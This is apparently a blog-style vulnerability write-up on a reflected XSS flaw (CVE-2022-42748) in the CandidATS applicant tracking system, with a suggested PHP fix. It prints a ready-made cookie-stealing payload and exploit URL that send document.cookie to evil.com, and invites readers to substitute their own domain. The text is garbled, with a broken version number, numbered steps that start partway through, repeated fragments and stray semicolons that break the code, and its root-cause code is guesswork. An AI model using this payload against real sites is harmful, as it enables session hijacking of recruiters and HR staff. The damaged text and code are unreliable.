CVE-2022-42748 - XSS in CandidATS 3.. lets Attackers Steal User Cookies via ‘sortDirection’

In November 2022, a vulnerability (CVE-2022-42748) was identified in CandidATS version 3.. – a popular open-source applicant tracking system. This bug lets external attackers craft malicious URLs to steal users’ cookies, thanks to insecure handling of the sortDirection parameter in the file ajax.php. Let’s break down what this CVE is about, how it works, and how it can be exploited.

What is CandidATS?

CandidATS is an open-source applicant tracking system for recruitment teams. Organizations use it to manage job postings, applicants, resumes, and communications – so the data it handles can be pretty sensitive.

Vulnerability Summary

- CVE: CVE-2022-42748

Impact: Attacker can steal cookies or perform actions as a logged-in user

The root issue is: when ajax.php processes the sortDirection parameter, it does not properly validate or sanitize its content. So, if you pass JavaScript code via URL parameters, it can end up in the page and execute as if it came from a legit user (classic reflected XSS).

Victim clicks the link (perhaps sent via email, or posted somewhere).

3. The payload executes in the victim's browser, potentially stealing authentication cookies or performing actions on their behalf.

Let’s look at code. Suppose the application generates a URL like

http://victim.com/ajax.php?sortDirection=desc

But the app fails to sanitize input. So an attacker could make

http://victim.com/ajax.php?sortDirection=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Which is

http://victim.com/ajax.php?sortDirection=<script>alert(document.cookie)</script>;

When a logged-in user visits this link, their browser will pop up an alert showing their cookies. A real attacker could send code to capture those cookies and send them to their server.

Example Exploit Snippet

Here’s a sample payload to send the victim’s cookie to the attacker’s server (replace evil.com with your own domain):

<script>
  fetch('https://evil.com/hook?cookie='; + document.cookie);
</script>

URL-encoded, this becomes

http://victim.com/ajax.php?sortDirection=%3Cscript%3Efetch('https://evil.com/hook?cookie=';+document.cookie);%3C/script%3E

Launch further attacks

This is especially dangerous for recruiters, HR, or anyone who uses those credentials for other systems, too.

The Root Cause

Looking at the CandidATS ajax.php source (based on open repository), the script probably takes the sortDirection parameter and places it into HTML output without escaping it:

$sortDirection = $_GET['sortDirection'];
echo "<div>Sort: $sortDirection</div>";

If $sortDirection contains JavaScript, it will be injected right into the page.

How to Fix

Developers should sanitize all user input before use, especially variables that end up inside HTML. In PHP, use htmlspecialchars() for output:

$sortDirection = htmlspecialchars($_GET['sortDirection'], ENT_QUOTES, 'UTF-8');
echo "<div>Sort: $sortDirection</div>";

Original References

- NVD CVE-2022-42748
- Exploit-DB 50994
- CandidATS GitHub

Victim, while logged into CandidATS, clicks the link.

3. The attacker's JavaScript runs in the victim’s browser, steals their cookies, and sends them to evil.com.

Conclusion

CVE-2022-42748 is a serious XSS vulnerability caused by unsanitized input in CandidATS 3... Any organization using this version should update ASAP, or at least sanitize their input using built-in PHP functions.

Always sanitize user input! Attackers are creative, but so are defenders who keep their eyes on security best-practices.


If you are using CandidATS:  
Go to your codebase and check how you handle any $_GET or $_POST input – never trust user data.

Stay safe and patch regularly!

*This post is an exclusive, simple-language guide for understanding and fixing CVE-2022-42748. For more details, dive into the official references above!*


Need help? Ask below or visit the OWASP XSS Prevention Cheat Sheet.

Timeline

Published on: 11/03/2022 20:15:00 UTC
Last modified on: 01/26/2023 20:20:00 UTC